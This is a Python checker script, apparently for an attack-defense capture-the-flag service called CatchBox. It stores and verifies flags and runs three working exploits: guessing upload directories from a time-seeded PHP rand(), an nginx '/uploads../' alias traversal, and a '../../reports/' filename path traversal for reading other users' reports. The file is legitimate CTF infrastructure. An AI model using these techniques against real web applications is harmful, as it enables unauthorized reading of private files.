checker.py (9604B)
"""Checker for the CatchBox service, built on enochecker3.

Registers the flag/noise store and retrieve handlers plus three exploit
handlers with the module-level ``checker`` object.
"""

from hashlib import md5
from logging import LoggerAdapter
import os
import random
import string
from subprocess import PIPE, Popen
from typing import Any, Optional, Tuple

from bs4 import BeautifulSoup
import dateutil.parser
from enochecker3 import (
    ChainDB,
    DependencyInjector,
    Enochecker,
    ExploitCheckerTaskMessage,
    GetflagCheckerTaskMessage,
    GetnoiseCheckerTaskMessage,
    InternalErrorException,
    MumbleException,
    PutflagCheckerTaskMessage,
    PutnoiseCheckerTaskMessage,
)
from enochecker3.utils import FlagSearcher, assert_equals, assert_in
from httpx import AsyncClient, Response

checker = Enochecker("CatchBox", 9090)


def app():
    """Return the application object of the module-level checker."""
    return checker.app


# Re-seed the PRNG from OS entropy at import time.
random.seed(int.from_bytes(os.urandom(16), "little"))

noise_alph = string.ascii_letters + string.digits


def noise(nmin: int, nmax: int) -> str:
    """Return a random alphanumeric string of length nmin..nmax (inclusive)."""
    n = random.randint(nmin, nmax)
    return "".join(random.choice(noise_alph) for _ in range(n))


def _php_quote(text: str) -> str:
    """Escape text for use inside a PHP single-quoted string literal."""
    # Backslash first, otherwise the backslashes added for quotes get doubled.
    return text.replace("\\", "\\\\").replace("'", "\\'")


def filehash(user: str, file: str, seed: int) -> str:
    """Compute md5(user . file . rand()) with PHP's rand() seeded by `seed`.

    The value is computed by piping a small script into a local `php`
    interpreter, so the result follows PHP's own srand()/rand() behavior.

    Raises:
        InternalErrorException: if the php process exits with a non-zero
            status (a checker-side problem, not a service fault).
    """
    code = (
        f"<?php srand({int(seed)}); "
        f"echo md5('{_php_quote(user)}'.'{_php_quote(file)}'.strval(rand())); ?>"
    )
    with Popen("php", stdin=PIPE, stdout=PIPE) as php:
        output = php.communicate(code.encode())[0]
    if php.returncode != 0:
        raise InternalErrorException(
            f"php exited with status {php.returncode} while hashing"
        )
    return output.strip().decode()


def str2epoch(text: str) -> int:
    """Parse a date string as UTC and return its Unix timestamp in seconds."""
    date = dateutil.parser.parse(text + " UTC")
    return int(date.timestamp())


def parse_html(logger: LoggerAdapter, r: Response) -> BeautifulSoup:
    """Parse the response body as HTML.

    Raises:
        MumbleException: if the parser fails; the raw body is logged first.
    """
    try:
        return BeautifulSoup(r.text, "html.parser")
    except Exception as err:
        logger.error(
            f"Invalid html from {r.request.method} {r.request.url.path}\n"
            + r.text
        )
        raise MumbleException(
            f"Invalid html ({r.request.method} {r.request.url.path})"
        ) from err


def assert_status_code(logger: LoggerAdapter, r: Response,
                       code: int, errmsg: Optional[str],
                       extra: Any = "") -> None:
    """Raise MumbleException unless the response has the expected status.

    Args:
        logger: receives the full response body and `extra` on mismatch.
        r: response to check.
        code: expected HTTP status code.
        errmsg: exception message; when None, a default is built from the
            request method and path.
        extra: additional context that is only written to the log.
    """
    if r.status_code == code:
        return
    logger.error(
        f"Bad service response for "
        f"{r.request.method} {r.request.url.path}:\n"
        f"Extra info: {str(extra)}\n{r.text}"
    )
    if errmsg is None:
        errmsg = f"{r.request.method} {r.request.url.path} failed"
    raise MumbleException(errmsg)


async def _register(client: AsyncClient,
                    logger: LoggerAdapter) -> Tuple[str, str]:
    """Register a fresh random account and return (username, password)."""
    username, password = noise(10, 20), noise(20, 30)
    data = {"action": "register", "username": username, "password": password}
    r = await client.post("/index.php", data=data)
    assert_status_code(logger, r, 200, "Register failed", extra=data)
    return username, password


async def _login(client: AsyncClient, logger: LoggerAdapter,
                 username: str, password: str) -> None:
    """Log the client in with the given credentials."""
    data = {"action": "login", "username": username, "password": password}
    r = await client.post("/index.php", data=data)
    assert_status_code(logger, r, 200, "Login failed", extra=data)


@checker.putflag(0)
async def putflag_file(task: PutflagCheckerTaskMessage, logger: LoggerAdapter,
                       client: AsyncClient, db: ChainDB) -> str:
    """Store the flag as the content of an uploaded file.

    Returns the attack info string "User <username> File <filename>".
    """
    username, password = await _register(client, logger)

    filename, content = noise(20, 30), task.flag
    data = {"action": "upload", "filename": filename, "content": content}
    r = await client.post("/index.php", data=data)
    assert_status_code(logger, r, 200, "File upload failed", extra=data)

    await db.set("info", (username, password, filename))

    return f"User {username} File {filename}"


@checker.getflag(0)
async def getflag_file(task: GetflagCheckerTaskMessage,
                       logger: LoggerAdapter, client: AsyncClient,
                       db: ChainDB) -> None:
    """Log in as the stored user and check the uploaded file holds the flag."""
    try:
        username, password, filename = await db.get("info")
    except KeyError:
        raise MumbleException("database info missing")

    await _login(client, logger, username, password)

    r = await client.get(f"/index.php?f={filename}")
    assert_status_code(logger, r, 200, "File download failed", extra=filename)

    assert_in(task.flag, r.text, "Flag missing")


@checker.putflag(1)
async def putflag_report(task: PutflagCheckerTaskMessage,
                         logger: LoggerAdapter, client: AsyncClient,
                         db: ChainDB) -> str:
    """Store the flag as the content of a report.

    Returns the attack info string "User <username> Report".
    """
    username, password = await _register(client, logger)

    data = {"action": "report", "content": task.flag}
    r = await client.post("/index.php", data=data)
    assert_status_code(logger, r, 200, "Upload failed", extra=data)

    await db.set("info", (username, password))

    return f"User {username} Report"


@checker.getflag(1)
async def getflag_report(task: GetflagCheckerTaskMessage,
                         logger: LoggerAdapter, client: AsyncClient,
                         db: ChainDB) -> None:
    """Log in as the stored user and check the report holds the flag."""
    try:
        username, password = await db.get("info")
    except KeyError:
        raise MumbleException("Database info missing")

    await _login(client, logger, username, password)

    r = await client.get("/index.php?r")
    assert_status_code(logger, r, 200, "Report download failed")

    assert_in(task.flag, r.text, "Flag missing")


@checker.putnoise(0)
async def putnoise_file(task: PutnoiseCheckerTaskMessage,
                        logger: LoggerAdapter, client: AsyncClient,
                        db: ChainDB) -> None:
    """Upload a file with random content and remember it for getnoise."""
    username, password = await _register(client, logger)

    filename, content = noise(20, 30), noise(20, 30)
    data = {"action": "upload", "filename": filename, "content": content}
    r = await client.post("/index.php", data=data)
    assert_status_code(logger, r, 200, "File upload failed", extra=data)

    await db.set("info", (username, password, filename, content))


@checker.getnoise(0)
async def getnoise_file(task: GetnoiseCheckerTaskMessage,
                        logger: LoggerAdapter, client: AsyncClient,
                        db: ChainDB, di: DependencyInjector) -> None:
    """Verify the noise file via the file list, direct download and its link.

    The link taken from the file list is fetched with a second client
    obtained from the dependency injector, i.e. one that did not log in.
    """
    try:
        # Named `content` so the module-level noise() helper is not shadowed.
        username, password, filename, content = await db.get("info")
    except KeyError:
        raise MumbleException("database info missing")

    await _login(client, logger, username, password)

    r = await client.get("/index.php?q=files")
    assert_status_code(logger, r, 200, "Files query failed")

    soup = parse_html(logger, r)
    files = [item.select("a") for item in soup.select("ul.filelist > li")]
    # Every list entry must carry exactly two anchors; the first anchor's
    # text is used as the file name and the second one's href as its URL.
    assert_equals(all(len(links) == 2 for links in files), True,
                  "noise missing")

    urls = {
        name.text.strip(): link.get("href", None) for name, link in files
    }
    assert_in(filename, urls, "Noise missing")
    public_url = urls[filename]
    assert_equals(isinstance(public_url, str), True, "noise missing")

    r = await client.get(f"/index.php?f={filename}")
    assert_status_code(logger, r, 200, "File download failed", extra=filename)
    assert_in(content, r.text, "Noise missing")

    anon = await di.get(AsyncClient)
    r = await anon.get(public_url)
    assert_status_code(logger, r, 200, "Public url invalid",
                       extra={"filename": filename, "url": public_url})
    assert_in(content, r.text, "Noise missing")


@checker.exploit(0)
async def exploit_file_creat(task: ExploitCheckerTaskMessage,
                             logger: LoggerAdapter, searcher: FlagSearcher,
                             client: AsyncClient) -> Optional[str]:
    """Guess the upload directory of the flag file from the user listing.

    Reads the timestamp listed next to the flag user and tries each of the
    15 seconds starting there as the rand() seed for the directory hash.
    NOTE(review): presumably the service derives the directory name from a
    time-seeded rand() at upload time -- confirm against the service code.
    """
    assert_equals(isinstance(task.attack_info, str), True,
                  "attack info missing")

    # Attack info has the form "User <username> File <filename>".
    parts = task.attack_info.split()
    assert_equals(len(parts), 4, "attack info invalid")
    _, flaguser, _, flagfile = parts

    r = await client.get("/?q=users")
    assert_status_code(logger, r, 200, "Users listing failed")

    soup = parse_html(logger, r)
    entries = [item.children for item in soup.select("ul.userlist > li")]
    try:
        # Each entry must have exactly two children: name and timestamp.
        times = {
            name.text.strip(): str2epoch(created.text.strip())
            for name, created in entries
        }
    except (ValueError, OverflowError) as err:
        # Wrong child count or an unparsable date is a service fault.
        logger.error(f"Malformed users listing ({err}):\n{r.text}")
        raise MumbleException("Users listing invalid") from err

    assert_in(flaguser, times, "Flag user missing")
    start = times[flaguser]
    for creat in range(start, start + 15):
        dirname = filehash(flaguser, flagfile, creat)
        r = await client.get(f"/uploads/{dirname}/{flagfile}")
        if flag := searcher.search_flag(r.text):
            return flag
    return None


@checker.exploit(1)
async def exploit_report_nginx(task: ExploitCheckerTaskMessage,
                               logger: LoggerAdapter, searcher: FlagSearcher,
                               client: AsyncClient) -> Optional[str]:
    """Fetch the flag user's report through the "/uploads../" path.

    The report file name is the md5 hex digest of the username.
    """
    assert_equals(isinstance(task.attack_info, str), True,
                  "attack info missing")

    # Attack info has the form "User <username> Report".
    parts = task.attack_info.split()
    assert_equals(len(parts), 3, "attack info invalid")
    _, flaguser, _ = parts
    reportfile = md5(flaguser.encode()).hexdigest()

    r = await client.get(f"/uploads../reports/{reportfile}")
    if flag := searcher.search_flag(r.text):
        return flag
    return None


@checker.exploit(2)
async def exploit_report_path(task: ExploitCheckerTaskMessage,
                              logger: LoggerAdapter, searcher: FlagSearcher,
                              client: AsyncClient) -> Optional[str]:
    """Read the flag user's report via a "../" file name on a fresh account.

    Registers a new user, uploads to "../../reports/<md5(username)>" and
    then downloads that same path, searching the response for a flag.
    """
    assert_equals(isinstance(task.attack_info, str), True,
                  "attack info missing")

    # Attack info has the form "User <username> Report".
    parts = task.attack_info.split()
    assert_equals(len(parts), 3, "attack info invalid")
    _, flaguser, _ = parts
    reportfile = md5(flaguser.encode()).hexdigest()

    await _register(client, logger)

    filepath = f"../../reports/{reportfile}"
    data = {"action": "upload", "filename": filepath, "content": "exploit2!"}
    r = await client.post("/index.php", data=data)
    assert_status_code(logger, r, 200, "Path traversal", extra=data)

    r = await client.get(f"/index.php?f={filepath}")
    if flag := searcher.search_flag(r.text):
        return flag
    return None


if __name__ == "__main__":
    checker.run()